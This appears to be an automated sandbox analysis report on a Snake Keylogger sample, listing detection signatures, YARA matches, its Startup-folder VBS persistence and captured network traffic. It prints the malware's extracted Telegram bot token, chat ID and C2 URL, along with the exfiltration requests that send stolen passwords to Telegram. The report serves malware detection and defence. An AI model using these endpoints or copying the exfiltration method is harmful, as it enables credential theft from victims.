Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Ndnownts.exe

Overview

General Information

Sample name:Ndnownts.exe
(renamed file extension from exe_ to exe)
Original sample name:Ndnownts.exe_
Analysis ID:1545025
MD5:297e05ee6ce9a0e345f5053d87ac7401
SHA1:3aaf227b2a441d16477f2db50b35c03711f1c583
SHA256:188d3957239f757531a5783322eaa577cef632c4bde8acc6b82ee166c79d4cc8
Infos:

Detection

Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Drops VBS files to the startup folder
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Ndnownts.exe (PID: 4544 cmdline: "C:\Users\user\Desktop\Ndnownts.exe" MD5: 297E05EE6CE9A0E345F5053D87AC7401)
    • InstallUtil.exe (PID: 5544 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • wscript.exe (PID: 1148 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsInvalid.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • IsInvalid.exe (PID: 3688 cmdline: "C:\Users\user\AppData\Roaming\IsInvalid.exe" MD5: 297E05EE6CE9A0E345F5053D87AC7401)
      • InstallUtil.exe (PID: 600 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7698096781:AAGQLD6o1kzjfTe7ym-NWYz9KeQ-WUS_Q04/sendMessage"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7698096781:AAGQLD6o1kzjfTe7ym-NWYz9KeQ-WUS_Q04/sendMessage?chat_id=6243598265", "Token": "7698096781:AAGQLD6o1kzjfTe7ym-NWYz9KeQ-WUS_Q04", "Chat_id": "6243598265", "Version": "5.1"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.1758641024.0000000006310000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000000.00000002.1750536952.0000000003588000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000002.1750536952.0000000003588000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
        00000000.00000002.1750536952.0000000003588000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x15fbe:$a1: get_encryptedPassword
        • 0x162aa:$a2: get_encryptedUsername
        • 0x15dca:$a3: get_timePasswordChanged
        • 0x15ec5:$a4: get_passwordField
        • 0x15fd4:$a5: set_encryptedPassword
        • 0x17640:$a7: get_logins
        • 0x175a3:$a10: KeyLoggerEventArgs
        • 0x1720e:$a11: KeyLoggerEventArgsEventHandler
        00000000.00000002.1750536952.0000000003588000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_SnakeKeyloggerDetects Snake KeyloggerditekSHen
        • 0x1af72:$x1: $%SMTPDV$
        • 0x19944:$x2: $#TheHashHere%&
        • 0x1af1a:$x3: %FTPDV$
        • 0x198e4:$x4: $%TelegramDv$
        • 0x1720e:$x5: KeyLoggerEventArgs
        • 0x175a3:$x5: KeyLoggerEventArgs
        • 0x1af3e:$m2: Clipboard Logs ID
        • 0x1b17c:$m2: Screenshot Logs ID
        • 0x1b28c:$m2: keystroke Logs ID
        • 0x1b566:$m3: SnakePW
        • 0x1b154:$m4: \SnakeKeylogger\
        Click to see the 50 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.2.Ndnownts.exe.6310000.11.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          1.2.InstallUtil.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            1.2.InstallUtil.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              1.2.InstallUtil.exe.400000.0.unpackJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
                1.2.InstallUtil.exe.400000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                • 0x14a6e:$a1: get_encryptedPassword
                • 0x14d5a:$a2: get_encryptedUsername
                • 0x1487a:$a3: get_timePasswordChanged
                • 0x14975:$a4: get_passwordField
                • 0x14a84:$a5: set_encryptedPassword
                • 0x160f0:$a7: get_logins
                • 0x16053:$a10: KeyLoggerEventArgs
                • 0x15cbe:$a11: KeyLoggerEventArgsEventHandler
                Click to see the 16 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: WScript or CScript Dropper
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsInvalid.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsInvalid.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsInvalid.vbs" , ProcessId: 1148, ProcessName: wscript.exe
                Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsInvalid.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsInvalid.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsInvalid.vbs" , ProcessId: 1148, ProcessName: wscript.exe

                Data Obfuscation

                barindex
                Sigma detected: Drops script at startup location
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\Ndnownts.exe, ProcessId: 4544, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsInvalid.vbs

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-30T01:42:09.210148+010028033053Unknown Traffic192.168.2.449733188.114.97.3443TCP
                2024-10-30T01:42:10.658395+010028033053Unknown Traffic192.168.2.449735188.114.97.3443TCP
                2024-10-30T01:42:13.555753+010028033053Unknown Traffic192.168.2.449739188.114.97.3443TCP
                2024-10-30T01:42:16.546534+010028033053Unknown Traffic192.168.2.449743188.114.97.3443TCP
                2024-10-30T01:42:27.376615+010028033053Unknown Traffic192.168.2.449756188.114.97.3443TCP
                2024-10-30T01:42:31.725216+010028033053Unknown Traffic192.168.2.449762188.114.97.3443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-30T01:42:07.252327+010028032742Potentially Bad Traffic192.168.2.449731193.122.130.080TCP
                2024-10-30T01:42:08.502333+010028032742Potentially Bad Traffic192.168.2.449731193.122.130.080TCP
                2024-10-30T01:42:09.939824+010028032742Potentially Bad Traffic192.168.2.449734193.122.130.080TCP
                2024-10-30T01:42:25.533575+010028032742Potentially Bad Traffic192.168.2.449754193.122.130.080TCP
                2024-10-30T01:42:26.643064+010028032742Potentially Bad Traffic192.168.2.449754193.122.130.080TCP
                2024-10-30T01:42:28.096136+010028032742Potentially Bad Traffic192.168.2.449757193.122.130.080TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-30T01:42:24.767893+010028530061A Network Trojan was detected192.168.2.449753149.154.167.220443TCP
                2024-10-30T01:42:42.464497+010028530061A Network Trojan was detected192.168.2.449769149.154.167.220443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Found malware configuration
                Source: 00000004.00000002.1940767610.0000000003FF9000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7698096781:AAGQLD6o1kzjfTe7ym-NWYz9KeQ-WUS_Q04/sendMessage?chat_id=6243598265", "Token": "7698096781:AAGQLD6o1kzjfTe7ym-NWYz9KeQ-WUS_Q04", "Chat_id": "6243598265", "Version": "5.1"}
                Source: InstallUtil.exe.600.7.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7698096781:AAGQLD6o1kzjfTe7ym-NWYz9KeQ-WUS_Q04/sendMessage"}
                Multi AV Scanner detection for domain / URL
                Source: nexoproducciones.clVirustotal: Detection: 13%Perma Link
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeReversingLabs: Detection: 45%
                Multi AV Scanner detection for submitted file
                Source: Ndnownts.exeVirustotal: Detection: 69%Perma Link
                Source: Ndnownts.exeReversingLabs: Detection: 45%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for dropped file
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeJoe Sandbox ML: detected
                Machine Learning detection for sample
                Source: Ndnownts.exeJoe Sandbox ML: detected

                Location Tracking

                barindex
                Tries to detect the country of the analysis system (by using the IP)
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Ndnownts.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49732 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49755 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 190.107.177.80:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 190.107.177.80:443 -> 192.168.2.4:49749 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49753 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49769 version: TLS 1.2
                Source: Ndnownts.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Ndnownts.exe, 00000000.00000002.1750536952.00000000037DA000.00000004.00000800.00020000.00000000.sdmp, Ndnownts.exe, 00000000.00000002.1741258818.000000000294A000.00000004.00000800.00020000.00000000.sdmp, Ndnownts.exe, 00000000.00000002.1752636794.0000000005500000.00000004.08000000.00040000.00000000.sdmp, Ndnownts.exe, 00000000.00000002.1750536952.0000000003762000.00000004.00000800.00020000.00000000.sdmp, IsInvalid.exe, 00000004.00000002.1926811297.0000000003339000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Ndnownts.exe, 00000000.00000002.1750536952.00000000037DA000.00000004.00000800.00020000.00000000.sdmp, Ndnownts.exe, 00000000.00000002.1741258818.000000000294A000.00000004.00000800.00020000.00000000.sdmp, Ndnownts.exe, 00000000.00000002.1752636794.0000000005500000.00000004.08000000.00040000.00000000.sdmp, Ndnownts.exe, 00000000.00000002.1750536952.0000000003762000.00000004.00000800.00020000.00000000.sdmp, IsInvalid.exe, 00000004.00000002.1926811297.0000000003339000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: protobuf-net.pdbSHA256}Lq source: Ndnownts.exe, 00000000.00000002.1758474408.0000000006240000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: protobuf-net.pdb source: Ndnownts.exe, 00000000.00000002.1758474408.0000000006240000.00000004.08000000.00040000.00000000.sdmp
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0157F206h1_2_0157F017
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0157FB90h1_2_0157F017
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h1_2_0157E538
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 022AF1F6h7_2_022AF007
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 022AFB80h7_2_022AF007
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h7_2_022AE528
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h7_2_022AEB5B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h7_2_022AED3C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 04B11A38h7_2_04B11620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 04B102F1h7_2_04B10040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 04B11471h7_2_04B111C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 04B1E759h7_2_04B1E4B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 04B10751h7_2_04B104A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 04B1B791h7_2_04B1B4E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 04B1DEA9h7_2_04B1DC00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 04B1C041h7_2_04B1BD98
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 04B11011h7_2_04B10D60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 04B1F009h7_2_04B1ED60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 04B1D1A1h7_2_04B1CEF8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 04B1F8B9h7_2_04B1F610
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 04B11A38h7_2_04B11610
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 04B1C8F1h7_2_04B1C648
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 04B1DA51h7_2_04B1D7A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 04B1E301h7_2_04B1E058
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 04B1F461h7_2_04B1F1B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 04B1C499h7_2_04B1C1F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 04B10BB1h7_2_04B10900
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 04B1EBB1h7_2_04B1E908
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 04B11A38h7_2_04B11966
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 04B1BBE9h7_2_04B1B940
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 04B1CD49h7_2_04B1CAA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 04B1FD11h7_2_04B1FA68
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 04B1D5F9h7_2_04B1D350

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49753 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49769 -> 149.154.167.220:443
                Uses the Telegram API (likely for C&C communication)
                Source: unknownDNS query: name: api.telegram.org
                Yara detected Generic Downloader
                Source: Yara matchFile source: 1.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Ndnownts.exe.3589550.4.raw.unpack, type: UNPACKEDPE
                Source: global trafficHTTP traffic detected: GET /Yinmwpj.pdf HTTP/1.1Host: nexoproducciones.clConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /Yinmwpj.pdf HTTP/1.1Host: nexoproducciones.clConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot7698096781:AAGQLD6o1kzjfTe7ym-NWYz9KeQ-WUS_Q04/sendDocument?chat_id=6243598265&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf9054f877039Host: api.telegram.orgContent-Length: 566Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot7698096781:AAGQLD6o1kzjfTe7ym-NWYz9KeQ-WUS_Q04/sendDocument?chat_id=6243598265&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf8ffd3cd5362Host: api.telegram.orgContent-Length: 566Connection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: Joe Sandbox ViewIP Address: 193.122.130.0 193.122.130.0
                Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49734 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49731 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49754 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49757 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49733 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49739 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49743 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49735 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49756 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49762 -> 188.114.97.3:443
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
